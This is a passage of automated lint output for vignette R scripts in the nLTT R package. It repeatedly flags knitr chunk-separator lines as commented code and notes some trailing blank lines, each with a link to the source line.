^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:14:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L14) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:18:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L18) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:25:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L25) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L27) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_average_nltt.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:3:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L3) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:9:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L9) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:16:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L16) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:29:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L29) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:36:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L36) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:43:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L43) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:61:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L61) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:64:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L64) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:71:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L71) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:91:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L91) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:94:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L94) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_average_nltt.R:100:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_average_nltt.R#L100) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_get_nltt_values.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:8:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L8) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:22:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L22) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:26:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L26) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:37:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L37) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:40:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L40) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:44:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L44) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:51:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L51) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:57:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L57) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:63:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L63) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:70:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L70) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:74:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L74) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:84:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L84) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:90:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L90) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:99:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L99) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:103:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L103) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:106:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L106) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:110:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L110) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:114:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L114) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:117:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L117) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:121:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L121) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:127:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L127) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:133:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L133) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:137:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L137) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:141:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L141) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:144:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L144) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:157:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L157) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:169:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L169) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:173:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L173) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:179:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L179) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:184:1:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_get_nltt_values.R#L184) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n 